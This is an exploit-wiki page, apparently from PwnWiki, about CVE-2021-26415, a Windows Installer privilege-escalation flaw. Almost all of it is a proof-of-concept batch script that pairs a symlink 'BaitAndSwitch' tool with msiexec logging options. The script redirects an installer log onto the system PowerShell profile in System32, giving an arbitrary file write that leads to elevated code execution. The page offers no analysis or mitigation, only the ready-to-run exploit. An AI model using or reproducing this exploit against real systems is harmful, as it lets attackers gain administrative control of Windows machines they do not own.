CVE-2021-26415 Windows Installer 特權提升漏洞

From PwnWiki

POC

@echo off
REM Put BaitAndSwitch, example.msi into C:\temp
echo > C:\temp\fakelog.txt
start C:\temp\BaitAndSwitch C:\temp\linkdir\link C:\temp\fakelog.txt C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
timeout /t 1
msiexec /j C:\temp\example.msi /t ksz /Li! C:\temp\linkdir\link /qn
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-26415_Windows_Installer_特權提升漏洞&oldid=1860"